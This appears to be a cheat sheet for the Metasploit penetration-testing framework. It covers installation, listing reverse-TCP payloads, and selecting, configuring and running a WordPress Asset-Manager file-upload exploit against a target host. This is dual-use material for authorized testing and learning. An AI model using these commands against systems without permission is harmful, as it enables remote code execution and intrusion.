Metasploit
Install
# UBUNTU
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
chmod 755 msfinstall && \
./msfinstall
Commands
# "show" can be used to view all available modules
msf6 > show -h
[*] Valid parameters for the "show" command are: all, encoders, nops, exploits, payloads, auxiliary, post, plugins, info, options, favorites
[*] Additional module-specific parameters are: missing, advanced, evasion, targets, actions
# Example
msf6 > show payloads
588 payload/windows/x64/vncinject/reverse_tcp_rc4 normal No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
589 payload/windows/x64/vncinject/reverse_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)
590 payload/windows/x64/vncinject/reverse_winhttp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)
591 payload/windows/x64/vncinject/reverse_winhttps normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)
# "use" will set the chosen module to be executed
msf6 > use $MODULE_PATH or $SEARCH_ID
# Ex:
588 exploit/unix/webapp/wp_asset_manager_upload_exec
msf6 > use exploit/unix/webapp/wp_asset_manager_upload_exec
OR
msf6 > use 588
msf6 exploit(unix/webapp/wp_asset_manager_upload_exec) >
# With a module selected, "show info" displays its options
# and description
msf6 exploit(unix/webapp/wp_asset_manager_upload_exec) > show info
Name: WordPress Asset-Manager PHP File Upload Vulnerability
Module: exploit/unix/webapp/wp_asset_manager_upload_exec
Platform: PHP
Arch: php
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2012-05-26
Provided by:
Sammy FORGIT
James Fitts <fitts.james@gmail.com>
Available targets:
Id Name
-- ----
0 asset-manager <= 2.0
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the wordpress application
VHOST no HTTP server virtual host
Payload information:
Description:
This module exploits a vulnerability found in Asset-Manager <= 2.0
WordPress plugin. By abusing the upload.php file, a malicious user
can upload a file to a temp directory without authentication, which
results in arbitrary code execution.
References:
OSVDB (82653)
http://www.securityfocus.com/bid/53809
https://www.exploit-db.com/exploits/18993
http://www.opensyscom.fr/Actualites/wordpress-plugins-asset-manager-shell-upload-vulnerability.html
https://wpscan.com/vulnerability/6106
# "set $OPTION $VALUE" will set the value of an option for the module
msf6 exploit(my/exploit/path) > set RHOSTS mysite.com
RHOSTS => mysite.com
# "run" will execute the exploit
msf6 exploit(my/exploit/path) > run
# Search for exploits
msf6 > search type:exploit fullname:"Windows X.Y.Z"
# type:exploit -> show only exploits
# fullname:"Windows X.Y.Z" -> filter for specific info